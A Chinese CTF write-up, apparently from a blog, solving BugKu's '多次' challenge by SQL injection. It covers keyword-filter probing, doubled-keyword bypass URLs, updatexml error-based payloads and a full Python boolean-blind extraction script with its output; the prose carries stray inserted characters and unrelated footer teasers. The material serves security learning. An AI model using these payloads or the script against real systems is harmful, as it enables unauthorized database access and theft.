BugKu-多次

多次

原題鏈接

http://120.24.86.145:9004

分析

  • 單引號(hào)出錯(cuò)
  • 加上%23,發(fā)現(xiàn)不出錯(cuò)了
  • 加上' and 1=1%23
    又出錯(cuò)了贬养,應(yīng)該是過(guò)濾了

這里學(xué)習(xí)到一個(gè)新知識(shí)昼捍,如何判斷過(guò)濾了哪些字符识虚?

采用異或注入。
在id=1后面輸入 '(0)'
發(fā)現(xiàn)不出錯(cuò)妒茬,那就將0換成1=1
如果出錯(cuò)担锤,那就是成功了

如果括號(hào)里面的判斷是假的,那么頁(yè)面就會(huì)顯示正確
那么同理乍钻,
如果我修改里面的內(nèi)容為length(‘union’)!=0
如果頁(yè)面顯示正確肛循,那就證明length(‘union’)==0的,也就是union被過(guò)濾了

同樣道理银择,測(cè)試出過(guò)濾字符 select,union,and,or

可以采用雙寫繞過(guò)多糠。測(cè)試payload:

http://120.24.86.145:9004/1ndex.php?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,2%23

頁(yè)面結(jié)果
2

database:

?id=1%27%20anandd%201=2%20ununionion%20seselectlect%201,database()%23

 web1002-1

tables:

注意information里面有or,要雙寫過(guò)濾
?id=-1' ununionion seselectlect 1, group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() #

頁(yè)面結(jié)果
flag1,hint

columns:

?id=-1' ununionion seselectlect 1, group_concat(column_name) from infoorrmation_schema.columns where table_schema=database() anandd table_name='flag1' %23

頁(yè)面結(jié)果
flag1,address

dump:

?id=-1' ununionion seselectlect 1, group_concat(flag1) from flag1 %23

頁(yè)面結(jié)果
usOwycTju+FTUUzXosjr

?id=-1' ununionion seselectlect 1, group_concat(address) from flag1 %23

頁(yè)面結(jié)果
./Once_More.php
下一關(guān)地址


進(jìn)入鏈接


測(cè)試?id=1'
報(bào)錯(cuò)

My Id =1'
Nobody!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

我還是一樣的辦法測(cè)試過(guò)濾

union substr sleep

雙寫無(wú)法繞過(guò)浩考,大小寫無(wú)法繞過(guò)夹孔,/*!*/無(wú)法繞過(guò)析孽。
更換函數(shù)搭伤,利用updatexml報(bào)錯(cuò)。

payload

# 查表
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~class,flag2~'

# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~flag2,address~'

# 查數(shù)據(jù)
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 結(jié)果
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

本題也可以用布爾盲注來(lái)做袜瞬,畢竟有回顯和明顯的TF標(biāo)志怜俐,因?yàn)榕銮梢苍趯W(xué)習(xí)盲注,做了一下吞滞,這里附上腳本:

import requests

def length_schema():
    for x in range(1,20):
        url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20length(database())='+str(x)+'%23'
        s = requests.get(url)
        if "Hello" in s.text:
            print 'schema_length is :' + str(x)
            global a
            a = int(x)
            break
        
def schema_name():
    x = 0
    name = ''
    while x < a:
        x = x + 1
        temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~' 
        for i in temp:
            url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
            s = requests.get(url)
            if "Hello" in s.text:
                name = name + str(i)

    print 'sechma_name is :' + name
    global schema_name
    schema_name = name

def all():
    temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
    temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    for x in xrange(0,20):
        table_name = ''
        for y in xrange(1,20):
            key = 0
            for i in temp:
                url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
                s = requests.get(url)
                if "Hello" in s.text:
                    key = 1
                    table_name = table_name + str(i)
            if key == 0:
                break
        if table_name == '':
            break
        print 'one of tables is:' + table_name
        for p in xrange(0,20):
            column_name = ''
            for q in xrange(1,20):
                key = 0
                for i in temp:
                    url_columns = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
                    s = requests.get(url_columns)
                    if "Hello" in s.text:
                        key = 1
                        column_name = column_name + str(i)
                if key ==0:
                    break
            if column_name == '':
                break
            print 'a column name of '+table_name+' is '+column_name
            for y in xrange(0,10):
                data = ''
                for z in xrange(1,20):
                    key = 0
                    for i in temp_data:
                        url_data = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20`'+schema_name+'`.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
                        s = requests.get(url_data)
                        if "Hello" in s.text:
                            data = data + str(i)
                            key = 1
                    if key == 0:
                        break
                if data == '':
                    break
                print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data

def main():
    length_schema()
    schema_name()
    all()
if __name__ == '__main__':
    main()

結(jié)果

schema_length is :9
sechma_name is :web1002-2
one of tables is:class
a column name of class is id
one data of web1002-2.class's id is 1
one data of web1002-2.class's id is 2
one data of web1002-2.class's id is 3
one data of web1002-2.class's id is 4
one data of web1002-2.class's id is 5
one data of web1002-2.class's id is 6
one data of web1002-2.class's id is 7
a column name of class is name
one data of web1002-2.class's name is TOM
one data of web1002-2.class's name is Jack
one data of web1002-2.class's name is Mack
one data of web1002-2.class's name is Jones
one data of web1002-2.class's name is James
one data of web1002-2.class's name is Fox
one data of web1002-2.class's name is Henry
one of tables is:flag2
a column name of flag2 is flag2
one data of web1002-2.flag2's flag2 is flag{Bugku-sql_6s-2
a column name of flag2 is address
one data of web1002-2.flag2's address is .
[Finished in 1620.8s]

flag

flag{bugku-sql_6s-2i-4t-bug}

知識(shí)點(diǎn)

報(bào)錯(cuò)注入佑菩,基本的過(guò)濾和繞過(guò),布爾盲注

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末裁赠,一起剝皮案震驚了整個(gè)濱河市殿漠,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌佩捞,老刑警劉巖绞幌,帶你破解...
    沈念sama閱讀 206,311評(píng)論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異一忱,居然都是意外死亡莲蜘,警方通過(guò)查閱死者的電腦和手機(jī)谭确,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,339評(píng)論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)票渠,“玉大人逐哈,你說(shuō)我怎么就攤上這事∥是辏” “怎么了昂秃?”我有些...
    開封第一講書人閱讀 152,671評(píng)論 0 342
  • 文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)杜窄。 經(jīng)常有香客問(wèn)我肠骆,道長(zhǎng),這世上最難降的妖魔是什么塞耕? 我笑而不...
    開封第一講書人閱讀 55,252評(píng)論 1 279
  • 正文 為了忘掉前任蚀腿,我火速辦了婚禮,結(jié)果婚禮上扫外,老公的妹妹穿的比我還像新娘莉钙。我一直安慰自己,他們只是感情好畏浆,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,253評(píng)論 5 371
  • 文/花漫 我一把揭開白布胆胰。 她就那樣靜靜地躺著,像睡著了一般刻获。 火紅的嫁衣襯著肌膚如雪蜀涨。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,031評(píng)論 1 285
  • 那天蝎毡,我揣著相機(jī)與錄音厚柳,去河邊找鬼。 笑死沐兵,一個(gè)胖子當(dāng)著我的面吹牛别垮,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播扎谎,決...
    沈念sama閱讀 38,340評(píng)論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼碳想,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了毁靶?” 一聲冷哼從身側(cè)響起胧奔,我...
    開封第一講書人閱讀 36,973評(píng)論 0 259
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎预吆,沒(méi)想到半個(gè)月后龙填,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,466評(píng)論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,937評(píng)論 2 323
  • 正文 我和宋清朗相戀三年岩遗,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了扇商。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,039評(píng)論 1 333
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡宿礁,死狀恐怖案铺,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情窘拯,我是刑警寧澤红且,帶...
    沈念sama閱讀 33,701評(píng)論 4 323
  • 正文 年R本政府宣布,位于F島的核電站涤姊,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏嗤放。R本人自食惡果不足惜思喊,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,254評(píng)論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望次酌。 院中可真熱鬧恨课,春花似錦、人聲如沸岳服。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,259評(píng)論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)吊宋。三九已至纲辽,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間璃搜,已是汗流浹背拖吼。 一陣腳步聲響...
    開封第一講書人閱讀 31,485評(píng)論 1 262
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留这吻,地道東北人吊档。 一個(gè)月前我還...
    沈念sama閱讀 45,497評(píng)論 2 354
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像唾糯,于是被迫代替她去往敵國(guó)和親怠硼。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,786評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊(cè) 說(shuō)明:本文為轉(zhuǎn)載移怯,對(duì)原文中一些明顯的拼寫錯(cuò)誤進(jìn)行修正香璃,并標(biāo)注對(duì)自己有用的信息。 ======...
    wind_飄閱讀 2,033評(píng)論 0 5
  • web應(yīng)用程序會(huì)對(duì)用戶的輸入進(jìn)行驗(yàn)證芋酌,過(guò)濾其中的一些關(guān)鍵字增显,這種過(guò)濾我們可以試著用下面的方法避開。 1、 不使用被...
    查無(wú)此人asdasd閱讀 7,262評(píng)論 0 5
  • 我使用的是火狐瀏覽器 使用火狐瀏覽器的hackbar插件 如果有錯(cuò)誤的地方希望大家多多指出同云,多謝多謝 WEB2 點(diǎn)...
    yangc隨想閱讀 54,235評(píng)論 11 16
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,256評(píng)論 2 22
  • 夏天漸漸走近糖权, 氣溫逐日升高。 出門多多飲水炸站, 帶把雨傘最好星澳。 ……墨香樓…… ??
    墨香樓閱讀 232評(píng)論 0 2